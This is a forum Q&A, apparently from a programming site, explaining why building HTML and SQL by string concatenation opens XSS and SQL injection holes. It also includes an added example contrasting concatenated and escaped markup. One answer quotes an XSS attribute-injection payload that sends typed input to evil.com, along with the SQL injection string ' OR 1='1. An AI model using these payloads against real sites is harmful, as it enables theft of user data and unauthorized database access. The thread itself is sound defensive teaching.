I was told recently (on here) that concatenating your JavaScript will cause XSS vulnerabilities. I have done my research on here and on Google to find out why this is bad, but I am not seeing it.
Part 1 - JavaScript: Apparently something like this is the unsafe way. Why? How should you do it instead?
// part of a script dynamically making table rows
var el = document.createElement('div');
el.innerHTML = '<input type="text" id="myId'+id+'" />';
cellOne.appendChild(el);
Part 2 - MySQL: I was told that when you concat SQL, it exposes you to SQL injections. I am not sure what they meant by concat SQL exactly. I assume they were not talking about the SQL concat function. I am guessing they meant:
$sql = " SELECT `col` FROM `table` WHERE `col` = '".$myFilteredVariable."' ";
Or maybe?
$sql = " SELECT `col` FROM `table` WHERE `col` = '".$myFilteredVariable."' ";
$sql .= " AND `col2` = '".$myvar."' ";
Does this expose you to SQL injection?
The SQL part is academic. I use PDO to prevent SQL injection.
It can be, if id comes from user input that persists on the page.
The id variable may contain...
" onchange="(new Image).src='http://evil.com/user-input=' + this.value;" bla="
Unless those variables are escaped using the correct mechanism, there is a vulnerability.
The $myvar variable may contain...
' OR 1='1
How would you do it instead:
var el = document.createElement('div');
var input = document.createElement("input");
input.type = 'text';
input.id = 'myId' + id;
el.appendChild(input);
cellOne.appendChild(el);
Note this is safer because .id cannot inject arbitrary HTML.
For more information about XSS attack vectors I recommend reading the OWASP XSS article.
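The difference the two answers above describe, as an added example that is not part of the original question or answers: it builds the markup from the question by concatenation and again with the attribute value escaped, then lists which attributes each string would carry. It runs in Node without a DOM; `hostileId` is constructed sample input, and `escapeAttr`, `attributeNames` and `hasEventHandler` are hypothetical helpers.

```javascript
// Added example: markup built by concatenation vs. with the value escaped.

// Constructed sample input, shaped like the payload quoted in the answer above.
const hostileId = '1" onchange="sendSomewhere(this.value)" data-x="';

// The pattern from the question: the value lands in the markup verbatim.
function buildByConcat(id) {
  return '<input type="text" id="myId' + id + '" />';
}

// Hypothetical helper: escape characters that are significant inside a
// double-quoted HTML attribute value.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

function buildEscaped(id) {
  return '<input type="text" id="myId' + escapeAttr(id) + '" />';
}

// Minimal attribute lister for this one tag shape (double-quoted values only).
// It stands in for what the browser's HTML parser would see; not a real parser.
function attributeNames(tag) {
  const names = [];
  const re = /([^\s"'<>\/=]+)\s*=\s*"([^"]*)"/g;
  let m;
  while ((m = re.exec(tag)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Defender's check: does the markup carry any on* event-handler attribute?
function hasEventHandler(tag) {
  return attributeNames(tag).some((n) => n.startsWith('on'));
}

console.log(attributeNames(buildByConcat(hostileId))); // quote closed early
console.log(attributeNames(buildEscaped(hostileId)));  // value stays inside id
```

In the browser, setting `input.id` on a created element as shown in the answer avoids the string-building step entirely; escaping is the fallback when markup has to be produced as text.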
It's a concatenation question, not a question of XSS or SQL injection.
Nothing wrong with concatenation itself. It is a pretty safe operation.